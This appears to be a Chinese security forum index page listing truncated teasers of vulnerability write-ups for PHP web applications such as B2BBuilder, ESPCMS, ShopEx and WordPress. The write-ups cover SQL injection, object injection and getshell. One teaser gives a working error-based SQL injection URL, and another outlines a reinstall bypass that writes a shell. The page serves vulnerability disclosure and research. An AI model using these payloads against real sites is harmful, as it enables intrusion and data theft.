Web安全
【我爱T00LS】B2BBuilder头注入后台任意代码执行
看到小伙伴们都在B2Bbuilder 我也凑个热闹0x1 头注入Include/function.phpfunction getip(){if (isset($_SERVER)) {if (isset($_SERVER)) { $realip = $_SERVER;} elseif (isset($_SERVER)) { $realip = $_SERVER;} else { $realip = $_SERVER;}} else {if (getenv("HTTP_X_FORWARDED_FOR")) {
WordPress < 3.6.1 PHP 对象注入漏洞
0x00 背景当我读到一篇关于Joomla的“PHP对象注射”的漏洞blog后,我挖深了一点就发现Stefan Esser大神在2010年黑帽大会的文章:http://media.blackhat.com/bh-us-10/presentations/Esser/BlackHat-USA-2010-Esser-Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits-s
【我爱T00LS】ESPCMS 二次注入
漏洞位于 interface\public.php文件 in_invite 函数中核心代码如下:$ec_member_username_id = $this->member_cookieview('userid'); if ($ec_member_username_id) { $rsMember = $this->get_member_attvalue($ec_member_username_id); } $userid = $ec_member_username_id ? $ec_member_userna
![[我爱t00ls] B2BBuilder GetShell](https://www.t00ls.com/attachments/month_1309/1309052155e321d13641b1f1dd.jpg)
[我爱t00ls] B2BBuilder GetShell
来凑个热闹 漏洞最新版已修复重装绕过系统安装时 虽然install/index.php 有重装lock验证,但重装代码在 install.php 中 可以直接绕过验证,又结合下面的查询config表 直接写入文件 可以远程getshell getshell 第一步: 公网mysql中新建一个 web_config 表 CREATE TABLE `hy_web_config` ( `id` int(
![[我爱t00ls] B2BBuilder 又一注入漏洞](https://www.t00ls.com/attachments/month_1309/1309050251ff62a56d268c661e.jpg)
[我爱t00ls] B2BBuilder 又一注入漏洞
嘿嘿 看小小abc发了一个B2BBuilder漏洞,于是乎恍然大悟,不能死啃ecshop了,换个口味 就下载了一套B2BBuilder源码,抽根烟观之,在comment.php中文件代码如下:if (!empty($_GET)){if ($_GET==1) $sql="select title from ".NEWSD." where nid=".$_GET;if ($_GET==2) $sql="select title from ".
![[我爱t00ls] B2BBuilder 注入漏洞](https://www.t00ls.com/attachments/month_1309/13090501370ff535a4f8fa5e91.png)
[我爱t00ls] B2BBuilder 注入漏洞
最近工作好忙,这不有时间了,看看php代码,不能生锈呢.{:6_440:} 直接上利用方式,大家一看就懂.http://localhost/b2b/aboutus.php?type=12345' aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (user())),1,62)))a from information_schema.tables group by a)b) and
【我爱T00LS】wecenter 注入漏洞 原anwsion
system/function.inc.phpfunction fetch_ip(){if ($_SERVER and valid_ip($_SERVER)){$ip_address = $_SERVER;}else if ($_SERVER and $_SERVER){$ip_address = $_SERVER;}else if ($_SERVER){$ip_address = $_SERVER;}else if ($_SERVER){$ip_address = $_SERVER;}if ($ip_address === FALSE){$ip_add
【我爱T00LS】162100导航 GETSHELL
./inc/require/z_other_face_up.php$web = 'face-'.urlencode($session);//这个是从cookie中获取的,为cookie explode |之后的第一个字符//gmdate("YmdHis", time() + (floatval($web) * 3600));//本机上传if ($_POST == 1) { if ($web == 0) { err('系统设定为禁止上传。'); } if (is_arr
【我爱T00LS】易想团购 注入漏洞
以前截图存的 代码就不翻啦 直接放图片了第一个第二个
【我爱T00LS】shopex Getshell
ctl.product.phpclass ctl_product extends shopPage{ var $_call = 'call'; var $type = 'goods'; var $seoTag = array('shopname','brand','goods_name','goods_cat','goods_intro','goods_brief','brand_kw','goods_kw','goods_price','update_time','goods_bn'); function ctl_product
